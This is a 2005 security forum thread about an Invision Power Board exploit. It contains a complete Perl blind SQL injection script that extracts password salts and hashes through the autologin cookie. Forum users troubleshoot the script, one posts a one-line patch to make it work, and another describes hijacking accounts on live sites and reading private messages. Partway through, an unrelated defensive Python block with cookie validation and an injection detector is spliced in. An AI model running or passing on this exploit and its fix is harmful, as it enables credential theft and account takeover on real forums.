IT Security and Insecurity Portal

Invision Power Board SQL injection exploit by Coyl. CiaNeeD

Posted: Sun Jul 24, 2005 6:54 pm

Narsil
Regular user
Joined: Jul 20, 2005
Posts: 5

Quote:
#!/usr/bin/perl
## Invision Power Board SQL injection exploit by Coyl. CiaNeeD team.
## for stealing converge_pass_salt value from ipb database
## on some ipb forums it steals the legacy_password which is the first md5
## hash of the target password.
## vulnerable forum versions : 2.* (<2.0.4)
## tested on version 2.0.2
## * work on mysql 4.0, 4.1 versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## coded by Coyl
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## /ipb.pl 127.0.0.1 /fo/ 1
## [~] SERVER : 127.0.0.1
## [~] PATH : /fo/
## [~] MEMBER ID : 1
## [~] VALUE TO STEAL :
## [~] SEARCHING THE EASIEST WAY... [ FAILED ]
## [~] SEARCHING THE SALT [\5][ DONE ]
##
## SALT : UoU1o
##
## [~] SEARCHING THE PASS HASH [/32][ DONE ]
##
## PASS HASH : 1ab2bc1f32f231f234313444233d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
use IO::Socket;
if (@ARGV < 3) { &usage; }
$enum=0;
$cookie = 1;
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$prefix = ($ARGV[3])?($ARGV[3]):("ibf_");
$server =~ s!(http:\/\/)!!;
$request = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;
$|++;
$n = 0;
print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] VALUE TO STEAL : \r\n";
print "[~] SEARCHING THE EASIEST WAY... [|0]";
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$flag=0;
$field=1;
LOOP: while(1)
{
$pass = ($field)?('converge_pass_hash'):('converge_pass_salt');
if($field) { if(&found(96,123)==0) { &found(47,58)}}
if(!$field&&$flag) { &found(33,126) }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{[ DONE ]
};
if (!$flag) { print "\r\nSIMPLE PASS HASH : "; print $allchar."\r\n";}
else
{
print (($field)?("\r\n PASS HASH : "):("\r\n SALT : "));
print $allchar."\r\n\r\n";
$allchar='';
$enum=0;
$s_num=1;
$field++;
if (!($field==2)){print "[~] SEARCHING THE PASS HASH [|0]"; redo LOOP};
}
}
else
{
if (!$flag)
{
print "$back FAILED ]\r\n";
print "[~] SEARCHING THE SALT [|0]";
$flag=1;
$field=0;
redo LOOP;
}
if ($flag)
{
print "$back FAILED ]\r\n";
}
}
exit();
}
else
{ $allchar .= $char;
$enum++;
}
$s_num++;
}
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=&crack($fmin,$fmax); return $i; }
$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}
sub check($)
{
$n++;
status();
$ccheck = $_[0];
$non="1%2527+union+select+converge_id%2Cconverge_pass_salt%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0+from+".$prefix."members_converge+where+%28converge_id%3D";
$eas="1%2527+OR+%28id%3D";
$pass_hash1 = ($flag)?($non):($eas);
$pass_hash2 = "+AND+ascii%28substring%28";
$pass_hash3 = (($flag)?($pass):("legacy_password")).",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3);
while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) {
return 1; }
}
return 0;
}
sub status()
{
$status = $n % 5;
if ($enum<10) {$back="\b\b\b";}
else {$back="\b\b\b\b"};
if($status==0){ print "$back\\$enum]"; }
if($status==1){ print "$back-$enum]"; }
if($status==2){ print "$back/$enum]"; }
if($status==3){ print "$back|$enum]"; }
}
sub usage()
{
print q(
Invision Power Board v 2.0.0 - 2.0.4 SQL injection exploit modified
--------------------------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [prefix-optinal]
[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id]- user id for brute
[prefix] - database prefix \(ibf_ by default\)
e.g. ipb.pl 127.0.0.1 / 1 ipb_
--------------------------------------------------------------------
coded by Coyl. CiaNeeD team.
--------------------------------------------------------------------
greets to 1dt.w0lf RST/GHC , http://rst.void.ru , http://ghc.ru
--------------------------------------------------------------------
);
exit();
}
Well, it is a modification of the Invision Power Board SQL injection exploit by RST/GHC posted in this forum, but with some improvements.
But I get these results; does anyone know what it is, or is the exploit broken?
Quote:
[root@narsil ~]# perl ipb.pl www.--------.com / 1
[~] SERVER : www.----------.com
[~] PATH : /
[~] MEMBER ID : 1
[~] VALUE TO STEAL :
[~] SEARCHING THE EASIEST WAY... [ FAILED ]
[~] SEARCHING THE SALT [\5][ DONE ]
SALT : 6790868881
[~] SEARCHING THE PASS HASH |32][ DONE ]
PASS HASH : 48555556102974852531004853501014999559950985553495555100559950485557
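As an added example (not part of this thread and not IPB's own code), here is how the autologin cookie that the script above feeds into SQL can be handled defensively. The cookie fields are validated strictly after decoding, the member lookup is parameterised so cookie values never become SQL text, and a small scanner flags request lines whose Cookie header still contains SQL tokens once nested percent-encoding (the %2527 trick the script header mentions) is undone. The table name `ibf_members`, its `pass_hash` column, the sample hash, the attack-shaped cookie and the three request lines are constructed assumptions for the example.

```python
import re
import sqlite3
from urllib.parse import unquote

# Expected shape of the two autologin cookie fields (assumed for this example:
# an integer member id and a 32-character lowercase hex md5 digest).
MEMBER_ID_RE = re.compile(r"^[0-9]{1,10}$")
PASS_HASH_RE = re.compile(r"^[0-9a-f]{32}$")

# Tokens that have no business in a password hash; used by the detector below.
INJECTION_MARKERS = ("'", "union", "select", "/*", "--", "substring(", "ascii(")

# Constructed sample data (not from the thread): a benign hash, a cookie shaped
# like the one the script sends (double-encoded quote, comment terminator), and
# three request lines as a log extract might record them.
GOOD_HASH = "0123456789abcdef0123456789abcdef"
GOOD_COOKIE = "member_id=1; pass_hash=" + GOOD_HASH
ATTACK_COOKIE = ("member_id=%31; pass_hash=1%2527+OR+%28id%3D%31+AND+"
                 "ascii%28substring%28legacy_password%2C1%2C1%29%29%3D50%29+%2F%2A")
SAMPLE_REQUESTS = [
    "GET /index.php?act=Login&CODE=autologin HTTP/1.0 Cookie: member_id=7; pass_hash=" + GOOD_HASH,
    "GET /index.php?act=Login&CODE=autologin HTTP/1.0 Cookie: " + ATTACK_COOKIE,
    "GET /index.php HTTP/1.0",
]


def parse_cookie_header(header):
    """Split a raw Cookie header into a dict. Values are percent-decoded once,
    which is what a PHP-style $_COOKIE array hands the application."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = unquote(value.strip())
    return cookies


def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (%2527 -> %27 -> ') so a check sees what the
    innermost consumer would see. Stops once decoding becomes a no-op."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def validate_autologin(cookies):
    """Return (member_id, pass_hash) only if both fields match their expected
    shape exactly; anything else is rejected before it can reach SQL."""
    member_id = cookies.get("member_id", "")
    pass_hash = cookies.get("pass_hash", "")
    if not (MEMBER_ID_RE.match(member_id) and PASS_HASH_RE.match(pass_hash)):
        return None
    return int(member_id), pass_hash


def build_sample_db():
    """Constructed in-memory stand-in for the members table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ibf_members (id INTEGER PRIMARY KEY, name TEXT, pass_hash TEXT)")
    conn.execute("INSERT INTO ibf_members VALUES (1, 'admin', ?)", (GOOD_HASH,))
    return conn


def autologin(conn, cookie_header):
    """Validate the cookie, then look the member up with a parameterised query:
    the driver binds the values, so they are never interpreted as SQL."""
    fields = validate_autologin(parse_cookie_header(cookie_header))
    if fields is None:
        return None
    member_id, pass_hash = fields
    return conn.execute(
        "SELECT id, name FROM ibf_members WHERE id = ? AND pass_hash = ?",
        (member_id, pass_hash),
    ).fetchone()


def looks_like_injection(raw_value):
    """Detection heuristic for one cookie value: decode all the way down, then
    look for SQL tokens. A blind-injection probe carries them in every request."""
    decoded = fully_decode(raw_value).lower()
    return any(marker in decoded for marker in INJECTION_MARKERS)


def scan_requests(lines):
    """Return (line_number, member_id) for request lines whose Cookie header
    trips the heuristic, so the probing member id can be reviewed."""
    hits = []
    for number, line in enumerate(lines, 1):
        if "Cookie:" not in line:
            continue
        cookies = parse_cookie_header(line.split("Cookie:", 1)[1])
        if any(looks_like_injection(v) for v in cookies.values()):
            hits.append((number, cookies.get("member_id")))
    return hits


if __name__ == "__main__":
    conn = build_sample_db()
    print("valid cookie  ->", autologin(conn, GOOD_COOKIE))
    print("attack cookie ->", autologin(conn, ATTACK_COOKIE))
    print("flagged lines ->", scan_requests(SAMPLE_REQUESTS))
```

The validation step alone closes the hole the script relies on, since a 32-hex-character whitelist leaves no room for a quote, a UNION or a comment; the parameterised query is the second layer in case a value ever bypasses validation. The scanner is only a triage aid: it decodes repeatedly because a single decode (what magic_quotes saw) is exactly what the %2527 encoding was designed to slip past.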

Posted: Mon Jul 25, 2005 4:04 am

devn00b
Regular user
Joined: Feb 20, 2005
Posts: 22

Interesting, I get the same thing with this... perhaps one of the sploitmasters round these parts will be able to take a look at this =)
/me looks for waraxe/linix/etc

Posted: Sun Aug 14, 2005 2:51 am

Aelphaeis_Mangarae
Beginner
Joined: Aug 14, 2005
Posts: 2

Quote:
But I get these results; does anyone know what it is, or is the exploit broken?
Quote:
[root@narsil ~]# perl ipb.pl www.--------.com / 1
[~] SERVER : www.----------.com
[~] PATH : /
[~] MEMBER ID : 1
[~] VALUE TO STEAL :
[~] SEARCHING THE EASIEST WAY... [ FAILED ]
[~] SEARCHING THE SALT [\5][ DONE ]
SALT : 6790868881
[~] SEARCHING THE PASS HASH |32][ DONE ]
PASS HASH : 48555556102974852531004853501014999559950985553495555100559950485557
I get the same thing... anyone know what is up with that?

Posted: Sat Aug 20, 2005 1:22 pm

Nordik
Regular user
Joined: Aug 20, 2005
Posts: 6

u forgot the prefix "ipb_" after the command line, look at the example

Posted: Tue Aug 23, 2005 12:23 pm

Aelphaeis_Mangarae
Beginner
Joined: Aug 14, 2005
Posts: 2

Nordik, I am unsure what you are trying to say..
You mean I put something like
exploit.pl host.com /folder/ 1 ipb_ ?
Would appreciate your help.

Posted: Tue Aug 23, 2005 5:30 pm

devn00b
Regular user
Joined: Feb 20, 2005
Posts: 22

That doesn't work, seeing as ibf_ is the default and you don't have to put that. Just look at the code.
There is something wrong though and I can't figure it out. Wish I could though..

Posted: Wed Aug 24, 2005 8:04 pm

Colton
Regular user
Joined: Aug 23, 2005
Posts: 5

Is this for 2.0.4 or earlier?
I tried it on a 2.0.4 board and it failed both ways.

Posted: Thu Aug 25, 2005 12:25 am

devn00b
Regular user
Joined: Feb 20, 2005
Posts: 22

vulnerable forum versions : 2.* (<2.0.4)
So 2.0.0, 2.0.1, 2.0.2, 2.0.3; otherwise it would be (<=2.0.4).
At least that's how I read it. I have spent a good bit of time working on this sploit and it's just flawed. I lack the skills needed to fix it. Still wishing someone will fix this bad boy and share it though.

Posted: Fri Aug 26, 2005 5:01 pm

Nordik
Regular user
Joined: Aug 20, 2005
Posts: 6

Last edited by Nordik on Wed Feb 18, 2009 10:13 pm; edited 1 time in total

error

Posted: Sun Sep 18, 2005 2:39 pm

nhtu
Beginner
Joined: Jan 13, 2005
Posts: 2

Code:
C:\>perl ipb.pl xx.xx.xx.xx / 1 ipb_
[~] SERVER : xx.xx.xx.xx
[~] PATH : /
[~] MEMBER ID : 1
[~] VALUE TO STEAL :
[~] SEARCHING THE EASIEST WAY... [-0]Can't use an undefined value as a symbol reference at ipb.pl line 154.
Why?

Posted: Mon Sep 19, 2005 2:38 pm

devn00b
Regular user
Joined: Feb 20, 2005
Posts: 22

Because the exploit is broken and doesn't work.

Posted: Tue Sep 20, 2005 1:13 pm

Nordik
Regular user
Joined: Aug 20, 2005
Posts: 6

Posted: Fri Dec 30, 2005 9:57 pm

paranoid
Beginner
Joined: Dec 30, 2005
Posts: 2

To get this exploit working
Code:
else
{ $allchar .= $char;
$enum++;
}
Replace the above code with
Code:
else
{ $allchar .= chr($char);
$enum++;
}
I've been having problems with it on some of my sites, and on others it works fine, so for a while I assumed it was broken, but after playing with it a bit more, I saw that the problems everyone here was having were because part of the script is intentionally broken... anyways, there's where to patch it, enjoy.

Posted: Thu Jan 05, 2006 6:14 pm

robin1200
Regular user
Joined: Sep 13, 2005
Posts: 19

Hey..
I have been able to get any hash using this exploit, then log in as any user by changing the cookie with Firefox. The problem is that when I log in as Admin it quickly sends me back to the index with an error message "YOU ARE NOT AUTHORIZED ENTER THIS SITE"; however, I am able to see PMs.
Any ideas?